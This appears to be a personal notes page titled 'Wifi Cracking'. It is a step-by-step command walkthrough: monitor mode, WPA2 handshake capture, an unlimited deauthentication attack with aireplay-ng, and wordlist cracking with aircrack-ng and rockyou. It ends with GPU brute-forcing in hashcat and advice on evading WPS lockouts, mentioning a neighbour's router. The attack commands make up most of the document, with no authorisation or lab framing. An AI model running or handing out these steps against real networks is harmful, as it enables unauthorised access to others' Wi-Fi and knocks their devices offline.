Wifi Cracking

WLAN Adapter:

  • ALFA Networks AWUS036ACH Dual Adaptor

LogoALFA Networks AWUS036ACH Dual Band USB Adaptor AC1200Amazon.com.au

INSTALL DRIVER & ACTIVATE MONITOR MODE:

https://www.youtube.com/watch?v=JiuW0Tc26kowww.youtube.com

CHECK FOR DEVICE: 

$iwconfig
$lsusb

UPDATE: 

$sudo apt update
$sudo apt upgrade -y
$sudo apt dist-upgrade -y
$sudo reboot now
$sudo apt update

INSTALL DRIVERS: 

$sudo apt install realtek-rtl88xxau-dkms
$sudo apt install dkms
$git clone https://github.com/aircrack-ng/rtl8812au
$cd rtl8812au
$sudo make
$sudo make install

UNPLUG DEVICE RECONNECT TO VM: 

$lsusb
$iwconfig

TEST: 

$sudo airmon-ng start wlan0
$sudo wifite --wpa --kill

Cracking WiFi WPA2 Handshake

See interfaces: 

ip addr
iwconfig

kill processes: 

sudo airmon-ng check kill

Start monitor mode: 

sudo airmon-ng start wlan0

Verify that monitor mode is used: 

sudo airmon-ng

You could also use iwconfig to check that interface is in monitor mode:

iwconfig

Get the AP's MAC address and channel: 

sudo airodump-ng wlan0

AP-MAC & channel:

- BSSID/MAC: 
- CHANNEL:

SHOW ONLY SINGLE MAC: 

$ sudo airodump-ng wlan0 -d A2:B5:3C:C1:F5:FC

1st Window: Make sure you replace the channel number and bssid with your own Replace hack1 with your file name like capture1 or something

sudo airodump-ng -w WIFI1 -c 10 --bssid A2:B5:3C:C1:F5:FC wlan0mon

2nd Window - deauth attack: Make sure you replace the bssid with your own

sudo aireplay-ng --deauth 0 -a A2:B5:3C:C1:F5:FC wlan0

Use Wireshark to open hack file: 

$ wireshark hack1-01.cap
Filter Wireshark messages for EAPOL
eapol

Stop monitor mode: 

sudo airmon-ng stop wlan0

Crack file with Rock you or another wordlist Make sure you have rockyou in text format (unzip file on Kali) Replace hack1-01.cap with your file name

aircrack-ng hack1-01.cap -w /usr/share/wordlists/rockyou.txt

Brute force WiFi WPA2 with GPU

Primarily you'll only have luck cracking WPS if the router is quite old and hasnt had any firmware updates (which most people dont update their router firmware so thats a good chance). Most, if not all, newer routers have brute force protections against WPS, typically in the form of timeouts and locks (as you are seeing on your neighbors router). When attacking WPS nowadays you need to use time modifiers (i dont know if wifite has that option, but bully and reaver do). Typically, in my experience from a couple years ago, you had to put at minimum 30 seconds between each attempt, but im not sure what the standard would be nowadays for that.

WIFITE: 

sudo wifite --wpa --kill
Crlt C
(choose NUM)
c (WPA handshake)
ls
cd hs
ls
sudo /usr/share/hashcat-utils/cap2hccapx.bin handshake_KitkatHouse_F8-CA-59-A0-79-3F_2022-12-29T22-22-06.cap wpa2.hccapx
ls

HASHCAT: Install CUDA Toolkit: https://developer.nvidia.com/cuda-downloads

cd downloads
cd hashcat-6.2.6
hashcat.exe -I
hashcat.exe -m 22000 -a 3 wpa2.hccapx ?d?d?d?d?d?d?d?d

NextSpam

Last updated